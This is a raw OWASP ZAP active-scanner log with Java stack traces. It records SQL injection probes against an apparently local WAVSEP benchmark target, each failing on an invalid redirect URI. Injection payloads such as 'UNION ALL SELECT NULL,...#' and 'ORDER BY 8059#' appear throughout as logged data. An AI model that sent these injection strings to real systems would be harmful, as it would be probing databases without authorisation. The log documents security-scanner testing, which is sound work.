org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679757 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679758 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679758 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679759 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679760 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679761 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679761 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini) UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679762 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 1#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 1# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679763 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini ORDER BY 8059#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini ORDER BY 8059# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTest(SQLiUnionEngine.java:700) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.orderByTechnique(SQLiUnionEngine.java:724) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:818) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 21 more 9679764 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679765 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679765 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.findUnionCharCount(SQLiUnionEngine.java:838) at org.zaproxy.zap.extension.sqliplugin.SQLiUnionEngine.isUnionPayloadExploitable(SQLiUnionEngine.java:102) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:1024) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 19 more 9679766 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini UNION ALL SELECT NULL,NULL,NULL,NULL#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini UNION ALL SELECT NULL,NULL,NULL,NULL# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at 